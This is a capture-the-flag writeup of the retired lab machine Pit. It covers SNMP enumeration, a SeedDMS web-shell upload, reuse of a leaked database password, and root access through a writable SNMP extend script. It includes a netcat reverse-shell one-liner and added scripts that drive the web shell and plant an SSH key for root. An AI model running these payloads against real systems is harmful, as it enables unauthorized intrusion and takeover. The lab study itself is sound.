Pit is a retired Linux machine; the goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the services on the target.
Classic Scan
Full Port Scan
The port scans show 22/tcp (OpenSSH), 80/tcp (nginx 1.14), 9090/tcp (ssl, reported by nmap as zeus-admin) and 161/udp (SNMP) open.
The scan output also reveals the hostname dms-pit.htb, which we add to /etc/hosts.
Next we enumerate SNMP:
nmap -A -sU -p161 10.10.10.241 -Pn
snmpwalk -v2c -c public 10.10.10.241 .
/var/www/html/seeddms51x/seeddms
/usr/bin/monitor
These two paths in the snmpwalk output stand out.
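A full snmpwalk is long, and the two paths above are easy to miss in it. The following script is an added example, not part of the original writeup: it pulls every filesystem path out of a walk and lists the extend commands separately, since anything registered under nsExtendCommand is run by snmpd when its OID is read. The walk text is constructed to look like the relevant lines from this box (the OIDs are standard HOST-RESOURCES-MIB, UCD-SNMP-MIB and NET-SNMP-EXTEND-MIB names); on a real target you would feed it the saved output of `snmpwalk -v2c -c public 10.10.10.241 .` instead.

```shell
#!/bin/sh
# Added example (not from the original writeup): pull filesystem paths out of a
# snmpwalk dump so that interesting processes and extend scripts stand out.
# SAMPLE_WALK is constructed for the demo; the OIDs are the standard MIB names
# and the paths are the ones the writeup reports.

SAMPLE_WALK='HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/usr/lib/systemd/systemd"
HOST-RESOURCES-MIB::hrSWRunPath.640 = STRING: "/usr/sbin/snmpd"
HOST-RESOURCES-MIB::hrSWRunPath.812 = STRING: "/usr/sbin/nginx"
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
SNMPv2-MIB::sysContact.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
UCD-SNMP-MIB::dskPath.1 = STRING: /
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
'

# Print every absolute path found in the walk together with the OID that
# revealed it, de-duplicated, skipping the root filesystem and systemd noise.
walk_paths() {
    printf '%s' "$1" |
    sed -n 's/^\([A-Za-z0-9:-]*MIB::[^ ]*\) = STRING: *"\{0,1\}\(\/[^" ]*\)"\{0,1\}.*/\1 \2/p' |
    awk '$2 != "/" && $2 !~ /^\/usr\/lib\/systemd/ && !seen[$2]++'
}

# Only the nsExtend entries: name and command. These run under snmpd's
# privileges (root on a default install) whenever the extend OID is queried.
walk_extend_commands() {
    printf '%s' "$1" |
    sed -n 's/^NET-SNMP-EXTEND-MIB::nsExtendCommand\."\([^"]*\)" = STRING: *\(.*\)$/\1 \2/p'
}

# Demo on the constructed walk. For a real target save the walk to a file and
# pass "$(cat walk.txt)" instead.
echo "# paths:"
walk_paths "$SAMPLE_WALK"
echo "# extend commands:"
walk_extend_commands "$SAMPLE_WALK"
```

The extend list is the one to read first: a script there is both a code-execution primitive (if you can change what it runs) and a trigger you control remotely with a single snmpwalk.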
The first path sits under the web root, so let's browse to it.
It redirects us to a login page.
The default passwords did not work, so we tried michelle as both the username and the password, and that logged us in.
Now we enumerate the application itself.
Let's check searchsploit for a known vulnerability in this SeedDMS version.
There is an authenticated RCE exploit for it. We save the PHP code from the exploit as Shell.php and upload it as a new document.
The uploaded document gets document id 29, which is the value the fourth step of the exploit asks for.
example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd
let’s log in as
This reads /etc/passwd through the web shell. Several attempts to turn it into an interactive shell failed, so we continue enumerating through this URL instead.
Requesting ../../../../conf/settings.xml through the same cmd parameter gives us the SeedDMS settings.xml file.
It contains the database credentials:
dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
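Running commands one by one through the browser gets tedious, and the interesting part of settings.xml is a handful of attributes. The script below is an added example, not part of the original writeup or of SeedDMS: a wrapper that sends a command through the web shell (curl does the URL encoding, so pipes and quotes survive) and a parser that extracts the database settings. The URL assumes the hostname from the scan and document id 29 from the upload; the settings.xml sample is constructed from the attributes quoted above, not copied from the box.

```shell
#!/bin/sh
# Added example, not part of the original writeup: a wrapper for the SeedDMS
# web shell described above and a parser for the credentials in settings.xml.
# WS_BASE is an assumption (hostname from the scan, document id 29 from the
# upload); SETTINGS_XML is a constructed sample, not data from the box.

WS_BASE='http://dms-pit.htb/data/1048576/29/1.php'

# Run one command through the web shell. curl -G --data-urlencode takes care
# of the percent-encoding, so spaces, quotes and pipes in $1 arrive intact.
# This is the only network call here and is not executed by the demo below.
ws_exec() {
    curl -s -G --data-urlencode "cmd=$1" "$WS_BASE"
}

# Constructed settings.xml fragment carrying the values the writeup reports.
SETTINGS_XML='<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <site>
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false"/>
  </site>
</configuration>'

# Pull one attribute (dbUser, dbPass, ...) out of the <database> element.
# Prints nothing if the attribute is absent, so callers can test for emptiness.
db_setting() {
    printf '%s\n' "$2" | sed -n "s/.*<database[^>]* $1=\"\([^\"]*\)\".*/\1/p"
}

# One-line summary of the connection details. The dbPass is the value worth
# trying elsewhere (password reuse is how this box falls).
db_summary() {
    printf '%s@%s/%s password=%s\n' \
        "$(db_setting dbUser "$1")" "$(db_setting dbHostname "$1")" \
        "$(db_setting dbDatabase "$1")" "$(db_setting dbPass "$1")"
}

# Against the target you would combine the two:
#   db_summary "$(ws_exec 'cat ../../../../conf/settings.xml')"
# Offline demo on the constructed sample:
db_summary "$SETTINGS_XML"
```

The parser deliberately matches only inside the `<database ...>` element; grepping for `dbPass=` anywhere in the file would also pick up commented-out or example entries.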
Port 9090 presented a login screen earlier, so let's try these credentials there.
Logging in as seeddms fails, but the user michelle with the database password ied^ieY6xoquu works: the password was reused.
In the bottom-left menu there is a Terminal option.
From that terminal we can read the user flag, but /root is not accessible, so we continue with local enumeration.
linpeas.sh turned up nothing useful, so let's look at /usr/bin/monitor, the file the snmpwalk output pointed to.
Looking at it directly shows nothing at first.
ls -ld shows why: the standard permission bits only allow root.
getfacl, however, shows the owner, the group and the Access Control List (ACL), and the ACL grants our user more than the permission bits suggest.
Let's test whether we can actually write into it.
We can.
So instead of the existing check.sh we drop in a script that gives us a reverse shell:
echo "nc 10.10.14.157 4444 -e /bin/bash" > /usr/local/monitoring/check.sh
Then we start an nc listener and trigger the SNMP check so that the script runs:
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
The command runs with root privileges when the extend object is queried,
but it produces no output here.
This is the problem: the query returns nothing from the command we wrote, and the reverse shell never connects back either. So we change approach: we generate a key pair with ssh-keygen and let the script add the public key (the .pub file) to root's .ssh folder instead.
We copy the key over in the terminal and add it to root's authorized_keys that way.
Then we use the private key to ssh in as root and get a shell.
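Writing the payload by hand in the Cockpit terminal works, but it is easy to get the permissions on root's .ssh wrong and lock yourself out of the very shell you are installing. The script below is an added example, not part of the original writeup: it generates the check.sh body that the SNMP extend runs as root, installs the public key with the modes sshd insists on, and prints the trigger and login commands. The target address, community string and payload path are taken from the writeup; the sample public key is a constructed placeholder, not a real key.

```shell
#!/bin/sh
# Added example, not part of the original writeup: build the check.sh payload
# that the SNMP extend runs as root, using the ssh-key route the writeup ends
# with instead of the reverse shell that never connected back.
# Assumptions from the writeup: target 10.10.10.241, community "public",
# writable path /usr/local/monitoring/check.sh. SAMPLE_PUBKEY is a constructed
# placeholder, not a real key; generate your own with make_key.

TARGET=10.10.10.241
COMMUNITY=public
PAYLOAD_PATH=/usr/local/monitoring/check.sh
SAMPLE_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyMaterialNotARealKey00000 attacker@kali'

# Generate the key pair we will log in with and print the public half
# (not run in the demo; needs ssh-keygen).
make_key() {
    ssh-keygen -t ed25519 -N '' -f "$1" >/dev/null && cat "$1.pub"
}

# Emit the script body. It installs the public key into root's authorized_keys
# with the permissions sshd requires, and does not append a duplicate line if
# the trigger fires more than once.
build_check_sh() {
    pubkey="$1"
    cat <<EOF
#!/bin/sh
mkdir -p /root/.ssh
chmod 700 /root/.ssh
touch /root/.ssh/authorized_keys
grep -qxF '$pubkey' /root/.ssh/authorized_keys || printf '%s\n' '$pubkey' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
EOF
}

# Write the payload where the monitor script will pick it up and make it executable.
stage_payload() {
    build_check_sh "$1" > "$2" && chmod +x "$2"
}

# The extend entry only executes when its OID is read, so this query is the trigger.
# If the MIB is not installed, NET-SNMP-EXTEND-MIB::nsExtendObjects is .1.3.6.1.4.1.8072.1.3.2.
trigger_cmd() {
    printf 'snmpwalk -v2c -c %s %s NET-SNMP-EXTEND-MIB::nsExtendObjects\n' "$COMMUNITY" "$TARGET"
}

# What to run after the trigger; $1 is the private key file.
login_cmd() {
    printf 'ssh -i %s root@%s\n' "$1" "$TARGET"
}

# Demo on the placeholder key: show the payload and both commands without
# touching /usr/local/monitoring or the network. On the box you would run
#   stage_payload "$(make_key ~/.ssh/pit_root)" "$PAYLOAD_PATH"
# from the michelle terminal, then the trigger from your own machine.
echo "# would be written to $PAYLOAD_PATH:"
build_check_sh "$SAMPLE_PUBKEY"
echo "# trigger: $(trigger_cmd)"
echo "# then:    $(login_cmd ~/.ssh/pit_root)"
```

Because the payload runs without a terminal and without its output coming back, the script is written to be idempotent and quiet: the only observable result is that the ssh login starts working, which is exactly the check to make after the snmpwalk.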
Finally we have the root flag.
A difficult and challenging machine 🙂